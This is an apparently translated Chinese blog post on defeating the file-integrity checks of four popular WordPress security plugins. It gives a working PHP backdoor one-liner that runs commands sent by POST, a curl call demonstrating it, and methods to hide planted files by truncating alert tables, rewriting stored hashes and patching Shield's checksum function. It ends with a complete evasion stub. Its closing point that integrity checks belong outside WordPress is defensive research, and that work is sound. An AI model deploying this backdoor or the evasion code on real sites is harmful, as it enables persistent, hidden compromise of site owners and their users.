击败WordPress安全插件

         在开始阅读本文之前请记住:安全插件非常棒,您需要安装至少一个。它们是攻击者的第一道屏障,通常有助于在WordPress中保持良好的强化程度。但使用它们作为文件完整性检查程序很糟糕。很多永远不要相信他们.

Wordfence安全性(版本7.0.2 - + 2M有效安装)

         这是最流行的插件,有超过两百万的活动安装。这个插件的一个功能是(用他自己的话说):

将您的核心文件,主题和插件与WordPress.org存储库中的内容进行比较,检查其完整性并报告对您的任何更改。

         好吧,让我们测试一下将“frontdoor.php”文件添加到plugins文件夹,编辑“index.php”,并在WordFence文件夹中创建一个新的PHP。在所有情况下,我们的“后门”的内容将是:

<?php @$filter = $_POST['filter']; @$words = array($_POST['text']); @$filtered_words = array_filter($words, $filter);?>

我们可以看到我们的小后门完美运作:
$ curl http://localhost/wordpress/wp-content/plugins/wordfence/frontdoor.php --data "filter=system&text=uname -a"Linux kaiju 3.16.0-4-amd64 #1 SMP Debian 3.16.51-3 (2017-12-13) x86_64 GNU/Linux
         我对这个插件有点问题。即使设置最大敏感度,它也不会检测我的后门或修改的文件(U_U“)。嗯,事实并非如此:我遇到了一个问题...... User "admin" with "administrator" access has an easy password.Type: Insecure Password。也许“免费”版本效果不是很好,但我们可以使用此问题生成(检测到弱密码)来查看问题是如何存储并显示给管理员的。

         基本上,这个插件将问题信息存储在名为“ prefix _wfissues” 的表下的数据库中。在此表中,我们找到“严重性”以及用于警告管理员的消息。所以我们只需要用SQL查询进行“截断”来刷新这些信息。

         另外存在一个名为“__prefix__wfFileMods”的表,其中包含列“filename”,“filenameMD5”,“oldMD5”和“MD5”。我们可以操纵这个表,以便更隐蔽,不会触发警报。

iThemes Security(版本6.9.2 - + 900K有效安装)

         此插件使用的方法基于在“ itsec_local_file_list ” 键下保留文件列表,时间戳和他在表prefix_ options中拥有MD5 。看起来像:
a:3346:{s:15:"wp-settings.php";a:2:{s:1:"d";i:1519165466;s:1:"h";s:32:"65925f28e27552ed6844be036d90cc95";}s:9:".htaccess";a:2:{s:1:"d";i:1520727850;s:1:"h";s:32:"6c10a3562901b71856657cfe40321bd1";}......

         部署我们的植入后,我们只需要使用修改的每个文件的新md5值更新此数组。

All In One WP安全和防火墙(版本4.3.2 - + 600K有效安装)

         在这个插件的功能之间,我们可以看到:

文件更改检测扫描程序可以提醒您WordPress系统中是否有任何文件已更改。然后,您可以调查并查看这是否是合法的更改或注入了一些错误的代码。

         以与以前相同的方式,我们将修改PHP文件的内容(在这种情况下,我们将修改此插件拥有的“wp-security.php”文件):
<?php/*Plugin Name: All In One WP SecurityVersion: 4.3.2Plugin URI: https://www.tipsandtricks-hq.com/wordpress-security-and-firewall-pluginAuthor: Tips and Tricks HQ, Peter Petreski, Ruhul, IvyAuthor URI: https://www.tipsandtricks-hq.com/Description: All round best WordPress security plugin!Text Domain: all-in-one-wp-security-and-firewallDomain Path: /languagesLicense: GPL3*/ // Our backdoor @$filter = $_POST['filter']; @$words = array($_POST['text']); @$filtered_words = array_filter($words, $filter); // End of backdoor if(!defined('ABSPATH')){ exit; //Exit if accessed directly}...?>

         这次我们收到一条警告说文件/var/www/html/wordpress/wp-content/plugins/all-in-one-wp-security-and-firewall/wp-security.php已被修改。如果我们调查这个插件是如何工作的,我们会很快注意到在安装插件时在数据库中创建了新表。其中之一,前缀 _aiowps_global_meta,有一个元值“file_change_detection”和一个序列化数组,其中包含与每个文件关联的名称和元数据(时间戳和大小):
a:2397:{s:39:"/var/www/html/wordpress/wp-settings.php";a:2:{s:13:"last_modified";i:1507069246;s:8:"filesize";i:16246;}...
如果在执行扫描任务后发现任何更改(时间戳或大小已更改,或者存在文件添加或删除),则会填充另一个元数据,以警告更改。所以基本上这个插件可以保存带有文件的列表(名称,大小和最后更改),并将其与保存的值进行比较:如果某些内容不同,则会触发警报。为了破坏这种类型的检查,我们只需要在植入后门之后编辑这个序列化对象。

适用于WordPress的Shield Security(版本6.3.2 - + 70K有效安装)

         另一个带有文件完整性扫描程序的插件,它试图发现已修改的核心文件。如果我们使用grep进行少量搜索,我们深入研究代码,我们可以看到这个提取位于src / common / icwp-wpfunctions.php:
... /** * @return string[] */ public function getCoreChecksums() { $aChecksumData = false; $sCurrentVersion = $this->getVersion(); if ( function_exists( 'get_core_checksums' ) ) { // if it's loaded, we use it. $aChecksumData = get_core_checksums( $sCurrentVersion, $this->getLocale( true ) ); } else { $aQueryArgs = array( 'version' => $sCurrentVersion, 'locale' => $this->getLocale( true ) ); $sQueryUrl = add_query_arg( $aQueryArgs, 'https://api.wordpress.org/core/checksums/1.0/' ); $sResponse = $this->loadFS()->getUrlContent( $sQueryUrl ); if ( !empty( $sResponse ) ) { $aDecodedResponse = json_decode( trim( $sResponse ), true ); if ( is_array( $aDecodedResponse ) && isset( $aDecodedResponse[ 'checksums' ] ) && is_array( $aDecodedResponse[ 'checksums' ] ) ) { $aChecksumData = $aDecodedResponse[ 'checksums' ]; } } } return is_array( $aChecksumData ) ? $aChecksumData : array(); }...?>

         在这段代码中,我们可以看到插件如何检查get_core_checksums函数的存在。这是一个内部WordPress函数(在WordPress 3.7.0中引入),它向WordPress API(https://api.wordpress.org/core/checksums/1.0/)发出请求并检索核心文件的校验和。如果找不到该功能(可能是因为WordPress的旧版本),插件会执行请求并获取校验和。
... /** * @return string[] */ public function getCoreChecksums() { $aChecksumData = false; $sCurrentVersion = $this->getVersion(); if ( function_exists( 'get_core_checksums' ) ) { // if it's loaded, we use it. $aChecksumData = get_core_checksums( $sCurrentVersion, $this->getLocale( true ) ); } else { $aQueryArgs = array( 'version' => $sCurrentVersion, 'locale' => $this->getLocale( true ) ); $sQueryUrl = add_query_arg( $aQueryArgs, 'https://api.wordpress.org/core/checksums/1.0/' ); $sResponse = $this->loadFS()->getUrlContent( $sQueryUrl ); if ( !empty( $sResponse ) ) { $aDecodedResponse = json_decode( trim( $sResponse ), true ); if ( is_array( $aDecodedResponse ) && isset( $aDecodedResponse[ 'checksums' ] ) && is_array( $aDecodedResponse[ 'checksums' ] ) ) { $aChecksumData = $aDecodedResponse[ 'checksums' ]; } } } return is_array( $aChecksumData ) ? $aChecksumData : array(); }...?>

         避免检测的最简单方法是编辑此文件并更改返回值。如果函数返回并清空数组(返回数组();)插件会说“好的,一切都没问题”:
Core File Scanner ResultsThere were no modified files discovered in the scan. Cool :).

PoC || GTFO

         在这篇简短的文章中,我们已经了解了如何破坏WordPress中最流行的安全插件所使用的文件完整性检查。遵循这个想法,我们可以创建一个必须添加到加载的插件的代码存根。此代码将禁用(或隐藏)我们的文件后门。你可以改进它(这段代码只是一个显示主要想法的PoC)。
add_action("wp_head", "knockout"); define("DB_PRE", $table_prefix); function patch_shield ($line) { if (stristr($line, 'return is_array( $aChecksumData ) ? $aChecksumData : array();')) { return "return array();\n"; } return $line; } // Here is where the magic lies :) function knockout() { // Filenames we want to hide $hide = array("wp-settings.php", "wp-content/plugins/akismet/akismet.php"); // Ok, let's kill iThemes Security $o = get_option("itsec_local_file_list"); // Change the values foreach ($hide as $file) { $o[$file]['d'] = filemtime(get_home_path() . $file); // Timestamp $o[$file]['h'] = md5_file(get_home_path() . $file); // Hash } // Update values update_option("itsec_local_file_list", $o); // Kill WordFence alerts $con = mysql_connect(DB_HOST, DB_USER, DB_PASSWORD); mysql_select_db(DB_NAME); $query = "truncate ". DB_PRE ."wfIssues;"; mysql_query($query); // Kill All-in-One WP Security $query = "truncate ". DB_PRE . "aiowps_global_meta;"; mysql_query($query); // Patch Shield Security $shield = get_home_path() . "wp-content/plugins/wp-simple-firewall/src/common/icwp-wpfunctions.php"; if (file_exists($shield)) { echo "YEAH"; $lines = file($shield); $lines = array_map('patch_shield', $lines); var_dump($lines); file_put_contents($shield, implode('', $lines)); } }


最后的话

         不要相信WordPress中的安全插件进行的文件完整性检查。因为如果攻击者能够编辑您的文件,这意味着他可以编辑WordPress数据库中的任何内容并修补其他文件。所以这种检查总是必须使用像Wazuh或类似的软件从外部完成。


发表评论 / Comment

用心评论~